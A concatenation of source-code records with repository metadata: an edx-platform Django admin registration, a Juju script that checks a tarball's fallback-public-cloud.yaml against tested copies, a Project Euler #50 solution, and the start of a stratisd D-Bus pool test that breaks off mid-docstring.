ta/edx-platform,nttks/jenkins-test,jswope00/griffinx,ZLLab-Mooc/edx-platform,JCBarahona/edX,ESOedX/edx-platform,nikolas/edx-platform,Ayub-K
han/edx-platform,arifsetiawan/edx-platform,chudaol/edx-platform,pabloborrego93/edx-platform,EduPepperPD/pepper2013,ak2703/edx-platform,jbassen/edx-platform,jswope00/griffinx,edry/edx-platform,kmoocdev/edx-platform,bitifirefly/edx-platform,zubair-arbi/edx-platform,Endika/edx-platform,a-parhom/edx-platform,solashirai/edx-platform,AkA84/edx-platform,jazkarta/edx-platform,antonve/s4-project-mooc,shabab12/edx-platform,philanthropy-u/edx-platform,IndonesiaX/edx-platform,morpheby/levelup-by,pdehaye/theming-edx-platform,LICEF/edx-platform,inares/edx-platform,Kalyzee/edx-platform,doismellburning/edx-platform,EDUlib/edx-platform,pomegranited/edx-platform,B-MOOC/edx-platform,morpheby/levelup-by,mbareta/edx-platform-ft,antoviaque/edx-platform,zadgroup/edx-platform,olexiim/edx-platform,LearnEra/LearnEraPlaftform,bitifirefly/edx-platform,defance/edx-platform,DefyVentures/edx-platform,BehavioralInsightsTeam/edx-platform,EduPepperPD/pepper2013,nanolearningllc/edx-platform-cypress-2,vismartltd/edx-platform,a-parhom/edx-platform,jruiperezv/ANALYSE,Lektorium-LLC/edx-platform,jelugbo/tundex,dcosentino/edx-platform,deepsrijit1105/edx-platform,jbzdak/edx-platform,LICEF/edx-platform,doganov/edx-platform,shubhdev/edxOnBaadal,utecuy/edx-platform,Edraak/circleci-edx-platform,MSOpenTech/edx-platform,polimediaupv/edx-platform,jelugbo/tundex,mcgachey/edx-platform,devs1991/test_edx_docmode,marcore/edx-platform,cecep-edu/edx-platform,antonve/s4-project-mooc,sudheerchintala/LearnEraPlatForm,hamzehd/edx-platform,pelikanchik/edx-platform,valtech-mooc/edx-platform,defance/edx-platform,mcgachey/edx-platform,rue89-tech/edx-platform,eemirtekin/edx-platform,atsolakid/edx-platform,rue89-tech/edx-platform,4eek/edx-platform,mcgachey/edx-platform,mahendra-r/edx-platform,amir-qayyum-khan/edx-platform,mtlchun/edx,openfun/edx-platform,abdoosh00/edraak,andyzsf/edx,rue89-tech/edx-platform,jonathan-beard/edx-platform,cpennington/edx-platform,xingyepei/edx-platform,ak2703/edx-platform,arbrandes/edx-platform,doganov
/edx-platform,teltek/edx-platform,motion2015/a3,Stanford-Online/edx-platform,atsolakid/edx-platform,kalebhartje/schoolboost,hmcmooc/muddx-platform,simbs/edx-platform,mtlchun/edx,chand3040/cloud_that,abdoosh00/edx-rtl-final,jonathan-beard/edx-platform,Edraak/circleci-edx-platform,shubhdev/openedx,chand3040/cloud_that,Edraak/circleci-edx-platform,SravanthiSinha/edx-platform,jjmiranda/edx-platform,philanthropy-u/edx-platform,cyanna/edx-platform,Endika/edx-platform,don-github/edx-platform,Livit/Livit.Learn.EdX,kamalx/edx-platform,vikas1885/test1,AkA84/edx-platform,rationalAgent/edx-platform-custom,fintech-circle/edx-platform,antonve/s4-project-mooc,jswope00/GAI,chrisndodge/edx-platform,TsinghuaX/edx-platform,beni55/edx-platform,Edraak/edx-platform,jbzdak/edx-platform,Unow/edx-platform,synergeticsedx/deployment-wipro,louyihua/edx-platform,TeachAtTUM/edx-platform,knehez/edx-platform,TsinghuaX/edx-platform,prarthitm/edxplatform,RPI-OPENEDX/edx-platform,itsjeyd/edx-platform,shubhdev/edxOnBaadal,AkA84/edx-platform,nttks/edx-platform,Edraak/edraak-platform,y12uc231/edx-platform,playm2mboy/edx-platform,abdoosh00/edx-rtl-final,UXE/local-edx,edx/edx-platform,J861449197/edx-platform,polimediaupv/edx-platform,pelikanchik/edx-platform,dsajkl/123,CredoReference/edx-platform,wwj718/ANALYSE,itsjeyd/edx-platform,IITBinterns13/edx-platform-dev,jazztpt/edx-platform,adoosii/edx-platform,zubair-arbi/edx-platform,zhenzhai/edx-platform,eduNEXT/edunext-platform,romain-li/edx-platform,chudaol/edx-platform,4eek/edx-platform,eduNEXT/edx-platform,kmoocdev/edx-platform,EduPepperPD/pepper2013,chudaol/edx-platform,ampax/edx-platform-backup,eemirtekin/edx-platform,dcosentino/edx-platform,praveen-pal/edx-platform,DefyVentures/edx-platform,fintech-circle/edx-platform,benpatterson/edx-platform,mbareta/edx-platform-ft,zubair-arbi/edx-platform,TsinghuaX/edx-platform,ESOedX/edx-platform,xingyepei/edx-platform,J861449197/edx-platform,PepperPD/edx-pepper-platform,appsembler/edx-platform,edry/edx-platform,xin
jiguaike/edx-platform,analyseuc3m/ANALYSE-v1,franosincic/edx-platform,nttks/edx-platform,shubhdev/edx-platform,zhenzhai/edx-platform,doganov/edx-platform,antoviaque/edx-platform,edx/edx-platform,openfun/edx-platform,UOMx/edx-platform,kursitet/edx-platform,alexthered/kienhoc-platform,jswope00/griffinx,jolyonb/edx-platform,marcore/edx-platform,eestay/edx-platform,zofuthan/edx-platform,hamzehd/edx-platform,nanolearningllc/edx-platform-cypress-2,EduPepperPD/pepper2013,mjirayu/sit_academy,itsjeyd/edx-platform,polimediaupv/edx-platform,pabloborrego93/edx-platform,nanolearningllc/edx-platform-cypress,caesar2164/edx-platform,morenopc/edx-platform,EDUlib/edx-platform,procangroup/edx-platform,atsolakid/edx-platform,WatanabeYasumasa/edx-platform,vismartltd/edx-platform,jazztpt/edx-platform,bdero/edx-platform,don-github/edx-platform,vasyarv/edx-platform,ovnicraft/edx-platform,kxliugang/edx-platform,angelapper/edx-platform,waheedahmed/edx-platform,devs1991/test_edx_docmode,leansoft/edx-platform,jzoldak/edx-platform,EduPepperPDTesting/pepper2013-testing,prarthitm/edxplatform,UXE/local-edx,IITBinterns13/edx-platform-dev,torchingloom/edx-platform,mahendra-r/edx-platform,dcosentino/edx-platform,kmoocdev2/edx-platform,unicri/edx-platform,Lektorium-LLC/edx-platform,Edraak/edraak-platform,SivilTaram/edx-platform,J861449197/edx-platform,fintech-circle/edx-platform,xuxiao19910803/edx,IndonesiaX/edx-platform,halvertoluke/edx-platform,beacloudgenius/edx-platform,tanmaykm/edx-platform,Shrhawk/edx-platform,DNFcode/edx-platform,alu042/edx-platform,dkarakats/edx-platform,angelapper/edx-platform,inares/edx-platform,simbs/edx-platform,shurihell/testasia,chudaol/edx-platform,beacloudgenius/edx-platform,apigee/edx-platform,MakeHer/edx-platform,kamalx/edx-platform,chand3040/cloud_that,DefyVentures/edx-platform,jazkarta/edx-platform-for-isc,hkawasaki/kawasaki-aio8-0,hkawasaki/kawasaki-aio8-1,louyihua/edx-platform,devs1991/test_edx_docmode,benpatterson/edx-platform,jazkarta/edx-platform-for-isc,amir-
qayyum-khan/edx-platform,playm2mboy/edx-platform,motion2015/edx-platform,xinjiguaike/edx-platform,zadgroup/edx-platform,Stanford-Online/edx-platform,morenopc/edx-platform,ahmedaljazzar/edx-platform,Semi-global/edx-platform,jamiefolsom/edx-platform,jelugbo/tundex,mitocw/edx-platform,Edraak/edx-platform,shubhdev/edx-platform,fly19890211/edx-platform,pepeportela/edx-platform,mtlchun/edx,edry/edx-platform,hkawasaki/kawasaki-aio8-0,jamiefolsom/edx-platform,RPI-OPENEDX/edx-platform,ak2703/edx-platform,openfun/edx-platform,jazztpt/edx-platform,UOMx/edx-platform,chauhanhardik/populo,shabab12/edx-platform,apigee/edx-platform,MakeHer/edx-platform,mjirayu/sit_academy,shashank971/edx-platform,morenopc/edx-platform,Kalyzee/edx-platform,Ayub-Khan/edx-platform,dsajkl/123,analyseuc3m/ANALYSE-v1,hkawasaki/kawasaki-aio8-0,kalebhartje/schoolboost,jswope00/GAI,jazztpt/edx-platform,cpennington/edx-platform,WatanabeYasumasa/edx-platform,kxliugang/edx-platform,ak2703/edx-platform,MakeHer/edx-platform,cselis86/edx-platform,solashirai/edx-platform,openfun/edx-platform,lduarte1991/edx-platform,leansoft/edx-platform,olexiim/edx-platform,deepsrijit1105/edx-platform,arifsetiawan/edx-platform,etzhou/edx-platform,rismalrv/edx-platform,ubc/edx-platform,nikolas/edx-platform,chauhanhardik/populo_2,shubhdev/edxOnBaadal,mjg2203/edx-platform-seas,vikas1885/test1,Edraak/edx-platform,kmoocdev/edx-platform,jswope00/GAI,waheedahmed/edx-platform,chauhanhardik/populo,devs1991/test_edx_docmode,jazkarta/edx-platform-for-isc,ahmadiga/min_edx,jonathan-beard/edx-platform,SravanthiSinha/edx-platform,LearnEra/LearnEraPlaftform,WatanabeYasumasa/edx-platform,tiagochiavericosta/edx-platform,xuxiao19910803/edx-platform,playm2mboy/edx-platform,nttks/edx-platform,analyseuc3m/ANALYSE-v1,shashank971/edx-platform,franosincic/edx-platform,chand3040/cloud_that,doismellburning/edx-platform,stvstnfrd/edx-platform,ferabra/edx-platform,jolyonb/edx-platform,morenopc/edx-platform,bigdatauniversity/edx-platform,UOMx/edx-platform,Oma
rIthawi/edx-platform,vismartltd/edx-platform,IONISx/edx-platform,beni55/edx-platform,mbareta/edx-platform-ft,etzhou/edx-platform,praveen-pal/edx-platform,BehavioralInsightsTeam/edx-platform,LearnEra/LearnEraPlaftform,proversity-org/edx-platform,arbrandes/edx-platform,Semi-global/edx-platform,bdero/edx-platform,Kalyzee/edx-platform,RPI-OPENEDX/edx-platform,fintech-circle/edx-platform,RPI-OPENEDX/edx-platform,synergeticsedx/deployment-wipro,xinjiguaike/edx-platform,eemirtekin/edx-platform,hastexo/edx-platform,EduPepperPDTesting/pepper2013-testing,knehez/edx-platform,TeachAtTUM/edx-platform,olexiim/edx-platform,nagyistoce/edx-platform,romain-li/edx-platform,IONISx/edx-platform,etzhou/edx-platform,benpatterson/edx-platform,jolyonb/edx-platform,xuxiao19910803/edx,EDUlib/edx-platform,rationalAgent/edx-platform-custom,longmen21/edx-platform,stvstnfrd/edx-platform,ampax/edx-platform-backup,cognitiveclass/edx-platform,Lektorium-LLC/edx-platform,andyzsf/edx,cselis86/edx-platform,ahmedaljazzar/edx-platform,Stanford-Online/edx-platform,y12uc231/edx-platform,nanolearningllc/edx-platform-cypress,franosincic/edx-platform,pku9104038/edx-platform,halvertoluke/edx-platform,ferabra/edx-platform,amir-qayyum-khan/edx-platform,kalebhartje/schoolboost,kursitet/edx-platform,LICEF/edx-platform,CourseTalk/edx-platform,lduarte1991/edx-platform,fly19890211/edx-platform,inares/edx-platform,ZLLab-Mooc/edx-platform,torchingloom/edx-platform,proversity-org/edx-platform,beni55/edx-platform,devs1991/test_edx_docmode,a-parhom/edx-platform,franosincic/edx-platform,zubair-arbi/edx-platform,LearnEra/LearnEraPlaftform,amir-qayyum-khan/edx-platform,bigdatauniversity/edx-platform,xuxiao19910803/edx,dkarakats/edx-platform,gsehub/edx-platform,Softmotions/edx-platform,jonathan-beard/edx-platform,leansoft/edx-platform,andyzsf/edx,jruiperezv/ANALYSE,kxliugang/edx-platform,IONISx/edx-platform,eduNEXT/edunext-platform,philanthropy-u/edx-platform,halvertoluke/edx-platform,abdoosh00/edraak,jruiperezv/ANALYSE,alu042
/edx-platform,pomegranited/edx-platform,mahendra-r/edx-platform,jbassen/edx-platform,sameetb-cuelogic/edx-platform-test,cognitiveclass/edx-platform,J861449197/edx-platform,alu042/edx-platform,jazztpt/edx-platform,cpennington/edx-platform,kmoocdev2/edx-platform,shubhdev/edx-platform,martynovp/edx-platform,bitifirefly/edx-platform,10clouds/edx-platform,y12uc231/edx-platform,doganov/edx-platform,nanolearningllc/edx-platform-cypress-2,eduNEXT/edunext-platform,yokose-ks/edx-platform,rismalrv/edx-platform,RPI-OPENEDX/edx-platform,Edraak/circleci-edx-platform,jbassen/edx-platform,dcosentino/edx-platform,Edraak/edx-platform,rhndg/openedx,cecep-edu/edx-platform,gymnasium/edx-platform,abdoosh00/edraak,nanolearningllc/edx-platform-cypress-2,atsolakid/edx-platform,inares/edx-platform,shashank971/edx-platform,jjmiranda/edx-platform,alexthered/kienhoc-platform,marcore/edx-platform,wwj718/edx-platform,chrisndodge/edx-platform,jamiefolsom/edx-platform,B-MOOC/edx-platform,hmcmooc/muddx-platform,AkA84/edx-platform,utecuy/edx-platform,longmen21/edx-platform,pdehaye/theming-edx-platform,deepsrijit1105/edx-platform,MSOpenTech/edx-platform,rismalrv/edx-platform,carsongee/edx-platform,ahmadiga/min_edx,B-MOOC/edx-platform,pomegranited/edx-platform,PepperPD/edx-pepper-platform,syjeon/new_edx,chudaol/edx-platform,arifsetiawan/edx-platform,fly19890211/edx-platform,waheedahmed/edx-platform,Unow/edx-platform,Stanford-Online/edx-platform,morenopc/edx-platform,hkawasaki/kawasaki-aio8-2,mcgachey/edx-platform,IndonesiaX/edx-platform,tiagochiavericosta/edx-platform,arifsetiawan/edx-platform,JCBarahona/edX,OmarIthawi/edx-platform,jzoldak/edx-platform,cognitiveclass/edx-platform,ZLLab-Mooc/edx-platform,cselis86/edx-platform,polimediaupv/edx-platform,auferack08/edx-platform,beni55/edx-platform,iivic/BoiseStateX,cecep-edu/edx-platform,edx-solutions/edx-platform,iivic/BoiseStateX,tiagochiavericosta/edx-platform,mahendra-r/edx-platform,jzoldak/edx-platform,eemirtekin/edx-platform,eestay/edx-platform,defan
ce/edx-platform,JCBarahona/edX,JCBarahona/edX,lduarte1991/edx-platform,pabloborrego93/edx-platform,wwj718/edx-platform,caesar2164/edx-platform,sameetb-cuelogic/edx-platform-test,edry/edx-platform,chrisndodge/edx-platform,cyanna/edx-platform,antonve/s4-project-mooc,xingyepei/edx-platform,rhndg/openedx,shubhdev/openedx,vikas1885/test1,vasyarv/edx-platform,eduNEXT/edx-platform,rhndg/openedx,apigee/edx-platform,peterm-itr/edx-platform,ovnicraft/edx-platform,Kalyzee/edx-platform,zadgroup/edx-platform,vismartltd/edx-platform,kmoocdev2/edx-platform,don-github/edx-platform,CredoReference/edx-platform,zofuthan/edx-platform,vasyarv/edx-platform,msegado/edx-platform,ferabra/edx-platform,angelapper/edx-platform,AkA84/edx-platform,teltek/edx-platform,ampax/edx-platform,pku9104038/edx-platform,carsongee/edx-platform,nttks/jenkins-test,alu042/edx-platform,MSOpenTech/edx-platform,devs1991/test_edx_docmode,bigdatauniversity/edx-platform,miptliot/edx-platform,leansoft/edx-platform,ubc/edx-platform,adoosii/edx-platform,utecuy/edx-platform,nanolearningllc/edx-platform-cypress,xingyepei/edx-platform,dsajkl/reqiop,dkarakats/edx-platform,ahmadiga/min_edx,simbs/edx-platform,jazkarta/edx-platform,abdoosh00/edx-rtl-final,gsehub/edx-platform,mitocw/edx-platform,tiagochiavericosta/edx-platform,dsajkl/123,arifsetiawan/edx-platform,don-github/edx-platform,naresh21/synergetics-edx-platform,SravanthiSinha/edx-platform,Unow/edx-platform,inares/edx-platform,SravanthiSinha/edx-platform,zhenzhai/edx-platform,hastexo/edx-platform,dsajkl/reqiop,4eek/edx-platform,beacloudgenius/edx-platform,edry/edx-platform,nikolas/edx-platform,iivic/BoiseStateX,appsembler/edx-platform,10clouds/edx-platform,chauhanhardik/populo,MSOpenTech/edx-platform,carsongee/edx-platform,mitocw/edx-platform,martynovp/edx-platform,jamesblunt/edx-platform,MakeHer/edx-platform,rationalAgent/edx-platform-custom,Kalyzee/edx-platform,hamzehd/edx-platform,solashirai/edx-platform,edx-solutions/edx-platform,abdoosh00/edx-rtl-final,IONISx/edx-
platform,mushtaqak/edx-platform,CredoReference/edx-platform,rationalAgent/edx-platform-custom,eduNEXT/edunext-platform,pomegranited/edx-platform,xinjiguaike/edx-platform,don-github/edx-platform,Unow/edx-platform,jamesblunt/edx-platform,zerobatu/edx-platform,JCBarahona/edX,cyanna/edx-platform,torchingloom/edx-platform,shabab12/edx-platform,TeachAtTUM/edx-platform,kxliugang/edx-platform,wwj718/ANALYSE,chauhanhardik/populo_2,solashirai/edx-platform,B-MOOC/edx-platform,dsajkl/reqiop,DefyVentures/edx-platform,mjg2203/edx-platform-seas,UXE/local-edx,unicri/edx-platform,xuxiao19910803/edx,defance/edx-platform,hmcmooc/muddx-platform,Endika/edx-platform,dcosentino/edx-platform,jonathan-beard/edx-platform,ZLLab-Mooc/edx-platform,appliedx/edx-platform,miptliot/edx-platform,doismellburning/edx-platform,jazkarta/edx-platform-for-isc,MSOpenTech/edx-platform,BehavioralInsightsTeam/edx-platform,unicri/edx-platform,JioEducation/edx-platform,Livit/Livit.Learn.EdX,jolyonb/edx-platform,mushtaqak/edx-platform,adoosii/edx-platform,waheedahmed/edx-platform,ahmadiga/min_edx,eestay/edx-platform,solashirai/edx-platform,Livit/Livit.Learn.EdX,ahmadio/edx-platform,philanthropy-u/edx-platform,zadgroup/edx-platform,syjeon/new_edx,cyanna/edx-platform,ahmadio/edx-platform,jazkarta/edx-platform-for-isc,nttks/jenkins-test,sameetb-cuelogic/edx-platform-test,rhndg/openedx,ovnicraft/edx-platform,TsinghuaX/edx-platform,angelapper/edx-platform,UOMx/edx-platform,vismartltd/edx-platform,waheedahmed/edx-platform,synergeticsedx/deployment-wipro,IITBinterns13/edx-platform-dev,shubhdev/openedx,jswope00/griffinx,nanolearning/edx-platform,hamzehd/edx-platform,ahmadio/edx-platform,jamesblunt/edx-platform,ahmedaljazzar/edx-platform,motion2015/edx-platform,shubhdev/edx-platform,chauhanhardik/populo_2,xuxiao19910803/edx-platform,torchingloom/edx-platform,xuxiao19910803/edx-platform,arbrandes/edx-platform,EduPepperPDTesting/pepper2013-testing,jjmiranda/edx-platform,peterm-itr/edx-platform,playm2mboy/edx-platform,peter
m-itr/edx-platform,chauhanhardik/populo_2,naresh21/synergetics-edx-platform,mjirayu/sit_academy,cpennington/edx-platform,JioEducation/edx-platform,wwj718/edx-platform,analyseuc3m/ANALYSE-v1,hkawasaki/kawasaki-aio8-1,praveen-pal/edx-platform,iivic/BoiseStateX,eestay/edx-platform,kamalx/edx-platform,nanolearning/edx-platform,zadgroup/edx-platform,kamalx/edx-platform,pku9104038/edx-platform,raccoongang/edx-platform,mushtaqak/edx-platform,raccoongang/edx-platform,IONISx/edx-platform,vikas1885/test1,ak2703/edx-platform,morpheby/levelup-by,hamzehd/edx-platform,chauhanhardik/populo,ahmadio/edx-platform,shurihell/testasia,wwj718/ANALYSE,jazkarta/edx-platform,xuxiao19910803/edx-platform,procangroup/edx-platform,nanolearningllc/edx-platform-cypress,shurihell/testasia,dkarakats/edx-platform,zhenzhai/edx-platform,wwj718/ANALYSE,ahmadio/edx-platform,nttks/jenkins-test,SivilTaram/edx-platform,tanmaykm/edx-platform,romain-li/edx-platform,chauhanhardik/populo_2,procangroup/edx-platform,knehez/edx-platform,nagyistoce/edx-platform,simbs/edx-platform,peterm-itr/edx-platform,xuxiao19910803/edx-platform,appliedx/edx-platform,shubhdev/openedx,BehavioralInsightsTeam/edx-platform,J861449197/edx-platform,miptliot/edx-platform,lduarte1991/edx-platform,synergeticsedx/deployment-wipro,Lektorium-LLC/edx-platform,edx-solutions/edx-platform,franosincic/edx-platform,atsolakid/edx-platform,appliedx/edx-platform,proversity-org/edx-platform,deepsrijit1105/edx-platform,devs1991/test_edx_docmode,nikolas/edx-platform,pku9104038/edx-platform,WatanabeYasumasa/edx-platform,openfun/edx-platform,valtech-mooc/edx-platform,mjg2203/edx-platform-seas,appsembler/edx-platform,martynovp/edx-platform,hkawasaki/kawasaki-aio8-2,apigee/edx-platform,romain-li/edx-platform,shubhdev/edxOnBaadal,sudheerchintala/LearnEraPlatForm,olexiim/edx-platform,nanolearningllc/edx-platform-cypress-2,xuxiao19910803/edx,longmen21/edx-platform,iivic/BoiseStateX,zhenzhai/edx-platform,playm2mboy/edx-platform,EduPepperPDTesting/pepper2013-te
sting,jelugbo/tundex,mushtaqak/edx-platform,longmen21/edx-platform,wwj718/ANALYSE,cecep-edu/edx-platform,kursitet/edx-platform,TeachAtTUM/edx-platform,valtech-mooc/edx-platform,ESOedX/edx-platform,tiagochiavericosta/edx-platform,zerobatu/edx-platform,ampax/edx-platform-backup,morpheby/levelup-by,beni55/edx-platform,adoosii/edx-platform,jbassen/edx-platform,ampax/edx-platform-backup,ubc/edx-platform,pepeportela/edx-platform,jazkarta/edx-platform,Shrhawk/edx-platform,pepeportela/edx-platform,auferack08/edx-platform,ampax/edx-platform,mcgachey/edx-platform,motion2015/a3,IndonesiaX/edx-platform,knehez/edx-platform,nttks/edx-platform,ESOedX/edx-platform,cselis86/edx-platform,romain-li/edx-platform,antonve/s4-project-mooc,SravanthiSinha/edx-platform,teltek/edx-platform,jzoldak/edx-platform,praveen-pal/edx-platform,kalebhartje/schoolboost,raccoongang/edx-platform,rismalrv/edx-platform,fly19890211/edx-platform,JioEducation/edx-platform,eemirtekin/edx-platform,syjeon/new_edx,benpatterson/edx-platform,Softmotions/edx-platform,motion2015/a3,gymnasium/edx-platform,OmarIthawi/edx-platform,rue89-tech/edx-platform,pabloborrego93/edx-platform,wwj718/edx-platform,leansoft/edx-platform,kmoocdev/edx-platform,ovnicraft/edx-platform,bitifirefly/edx-platform,jswope00/griffinx,Shrhawk/edx-platform,alexthered/kienhoc-platform,zerobatu/edx-platform,edx/edx-platform,ampax/edx-platform,Softmotions/edx-platform,kmoocdev2/edx-platform,10clouds/edx-platform,mahendra-r/edx-platform,bigdatauniversity/edx-platform,pdehaye/theming-edx-platform,zofuthan/edx-platform,MakeHer/edx-platform,chand3040/cloud_that,CredoReference/edx-platform,stvstnfrd/edx-platform,pelikanchik/edx-platform,Edraak/circleci-edx-platform,mtlchun/edx,shubhdev/openedx,jbassen/edx-platform,jjmiranda/edx-platform,msegado/edx-platform,polimediaupv/edx-platform,mjirayu/sit_academy,auferack08/edx-platform,pomegranited/edx-platform,hkawasaki/kawasaki-aio8-2,DefyVentures/edx-platform,DNFcode/edx-platform,gsehub/edx-platform,stvstnfrd/ed
x-platform,chauhanhardik/populo,Endika/edx-platform,4eek/edx-platform,nikolas/edx-platform,zofuthan/edx-platform,motion2015/edx-platform,UXE/local-edx,vikas1885/test1,caesar2164/edx-platform,edx/edx-platform,torchingloom/edx-platform,sudheerchintala/LearnEraPlatForm,hkawasaki/kawasaki-aio8-1,dsajkl/reqiop,dsajkl/123,antoviaque/edx-platform,EduPepperPD/pepper2013,Softmotions/edx-platform,tanmaykm/edx-platform,Ayub-Khan/edx-platform,hastexo/edx-platform,dkarakats/edx-platform,pdehaye/theming-edx-platform,hmcmooc/muddx-platform,gymnasium/edx-platform,motion2015/a3,msegado/edx-platform,longmen21/edx-platform,itsjeyd/edx-platform,appsembler/edx-platform,mushtaqak/edx-platform,ahmadiga/min_edx,jelugbo/tundex,yokose-ks/edx-platform,procangroup/edx-platform,yokose-ks/edx-platform,vasyarv/edx-platform,Semi-global/edx-platform,arbrandes/edx-platform,cyanna/edx-platform,etzhou/edx-platform,motion2015/a3,sameetb-cuelogic/edx-platform-test,OmarIthawi/edx-platform,Edraak/edx-platform,shabab12/edx-platform,knehez/edx-platform,y12uc231/edx-platform,miptliot/edx-platform,kursitet/edx-platform,Semi-global/edx-platform,zerobatu/edx-platform,shubhdev/edxOnBaadal,nagyistoce/edx-platform | common/djangoapps/track/admin.py | common/djangoapps/track/admin.py | '''
django admin pages for courseware model
'''
from track.models import *
from django.contrib import admin
admin.site.register(TrackingLog)
| agpl-3.0 | Python | |
0196d9498644223959b4efae4fc084552bec8393 | Add check_tar test. | mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju,mjs/juju | check_tar.py | check_tar.py | #!/usr/bin/env python3
from argparse import ArgumentParser
import logging
import os
import tarfile
from textwrap import dedent
import re
import sys
class TarfileNotFound(Exception):
    """Raised when the specified tarfile cannot be found on disk."""
class TestedDirNotFound(Exception):
    """Raised when the specified tested-texts directory cannot be found."""
def get_fpc_text(juju_tar):
    """Return the fallback-public-cloud.yaml contents from a tarball.

    :param juju_tar: an open tarfile.TarFile to search.
    :return: the raw bytes of the single fallback-public-cloud.yaml member.
    :raises Exception: if the tarball contains zero or more than one copy
        of fallback-public-cloud.yaml.
    """
    # Match on basename so the file is found wherever it lives inside the
    # tarball's directory tree.
    fpc_members = [
        m for m in juju_tar.getmembers()
        if os.path.basename(m.name) == 'fallback-public-cloud.yaml']
    if len(fpc_members) == 1:
        return juju_tar.extractfile(fpc_members[0]).read()
    elif len(fpc_members) == 0:
        raise Exception('Tarfile has no fallback-public-cloud.')
    else:
        # Fixed message: previously read 'Tarfile {:d} copies of ...'
        # (missing the verb).
        raise Exception(
            'Tarfile has {:d} copies of fallback-public-cloud.'.format(
                len(fpc_members)))
def check_tar(tested_texts_dir, tar_filename):
    """Check the contents of the tarfile.

    tested_texts_dir is the name of a directory with the tested
    fallback-public-cloud texts.
    tar_filename is the filename of the tarfile.

    Returns 0 when the tarball's fallback-public-cloud.yaml matches a
    tested version (or the tarball is Juju 1.x and exempt), 1 otherwise.
    """
    base_tar_name = os.path.basename(tar_filename)
    # Juju 1.x tarballs never contain fallback-public-cloud.yaml.
    if re.match(r'juju-core_1\..*\.tar.gz', base_tar_name) is not None:
        logging.info(
            'Juju 1 does not use fallback-public-cloud.yaml. Skipping.')
        return 0
    try:
        tf = tarfile.open(tar_filename, 'r:*')
    except FileNotFoundError:
        raise TarfileNotFound('Tarfile not found: "{}"'.format(tar_filename))
    with tf:
        fpc_text = get_fpc_text(tf)
    try:
        tested_list = os.listdir(tested_texts_dir)
    except FileNotFoundError:
        raise TestedDirNotFound(
            'Tested dir not found: "{}"'.format(tested_texts_dir))
    # Compare the tarball's copy byte-for-byte against every tested version.
    for tested in tested_list:
        # Skip hidden files such as .gitignore.
        if tested.startswith('.'):
            continue
        with open(os.path.join(tested_texts_dir, tested), 'rb') as tested_file:
            if tested_file.read() == fpc_text:
                logging.info('fallback-public-cloud.yaml matched {}.'.format(
                    tested))
                return 0
    # for/else: runs when the loop finished without returning (no match).
    else:
        print(
            'fallback-public-cloud.yaml does not match a tested version.\n'
            'Please have the QA team test it before landing.',
            file=sys.stderr)
        return 1
def main():
    """CLI entry point: parse arguments and run check_tar.

    Returns the process exit status (0 on success, 1 on failure or on a
    missing tarfile/tested-texts directory).
    """
    logging.basicConfig(level=logging.INFO)
    parser = ArgumentParser(description=dedent("""\
        Ensure fallback-public-cloud.yaml has been tested.
        """))
    parser.add_argument('tested_texts_dir', help=(
        'The directory containing previously-tested versions of'
        ' fallback-public-cloud.'))
    parser.add_argument('tarfile', help='The tarfile to check.')
    args = parser.parse_args()
    try:
        return check_tar(args.tested_texts_dir, args.tarfile)
    except (TarfileNotFound, TestedDirNotFound) as e:
        # User-input errors: report cleanly instead of tracebacking.
        print(e, file=sys.stderr)
        return 1
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 | Python | |
a0123aad7414ce78be6b0c984f0895bba9568c99 | Solve 50. | klen/euler | 050/solution.py | 050/solution.py | # coding: utf-8
""" Project Euler problem #50. """
import itertools as it
def problem():
    u""" Solve the problem.

    The prime 41, can be written as the sum of six consecutive primes:

    41 = 2 + 3 + 5 + 7 + 11 + 13
    This is the longest sum of consecutive primes that adds to a prime below
    one-hundred.

    The longest sum of consecutive primes below one-thousand that adds to a
    prime, contains 21 terms, and is equal to 953.

    Which prime, below one-million, can be written as the sum of the most
    consecutive primes?

    Answer: 997651

    """
    limit = 10**6
    primes = list(primes_xrange(limit))
    # sums[i] is the sum of the first i primes, so every sum of consecutive
    # primes is a difference sums[j] - sums[i].  Stop accumulating once the
    # running total reaches the limit.
    sums = [0]
    while sums[-1] < limit:
        sums.append(sums[-1] + primes[len(sums) - 1])

    # All pairwise differences of the prefix sums are candidate consecutive-
    # prime sums; intersect with the prime set and take the largest.
    # NOTE(review): this maximizes the value rather than the run length;
    # for this limit the two coincide (997651) — confirm if the limit changes.
    return max(
        set(a - b for b, a in it.combinations(sums[:-1], 2)) & set(primes))
def primes_xrange(a, b=0):
    """Yield the primes in ``[start, stop)``.

    Mirrors range()'s calling convention: ``primes_xrange(stop)`` or
    ``primes_xrange(start, stop)``.
    """
    stop, start = (a, b) if not b else (b, a)
    # Sieve of Eratosthenes over [0, stop).
    primes = [True] * stop
    primes[0], primes[1] = [False, False]
    for idx, value in enumerate(primes):
        if value is True:
            # Knock out every multiple of idx from 2*idx up.  Floor division
            # keeps the slice length an int (the original `/` broke on
            # Python 3, where it yields a float).
            primes[idx * 2::idx] = [False] * ((stop - 1) // idx - 1)
            if idx >= start:
                yield idx
if __name__ == '__main__':
print problem()
| mit | Python | |
e3462c036da4030886594082a563b699b296a77c | Test Pool's AddDevs(). | trgill/stratisd,stratis-storage/stratisd,trgill/stratisd,mulkieran/stratisd,stratis-storage/stratisd,stratis-storage/stratisd,stratis-storage/stratisd-client-dbus,mulkieran/stratisd | tests/dbus/pool/test_add_devs.py | tests/dbus/pool/test_add_devs.py | # Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test adding blockdevs to a pool.
"""
import time
import unittest
from stratisd_client_dbus import Manager
from stratisd_client_dbus import Pool
from stratisd_client_dbus import StratisdErrorsGen
from stratisd_client_dbus import get_object
from stratisd_client_dbus._constants import TOP_OBJECT
from stratisd_client_dbus._implementation import PoolSpec
from .._misc import checked_call
from .._misc import _device_list
from .._misc import Service
_PN = PoolSpec.MethodNames
_DEVICE_STRATEGY = _device_list(1)
class AddDevsTestCase(unittest.TestCase):
    """
    Test adding devices to a pool which is initially empty.
    """

    # Name used for the pool created in setUp.
    _POOLNAME = 'deadpool'

    def setUp(self):
        """
        Start the stratisd daemon with the simulator.

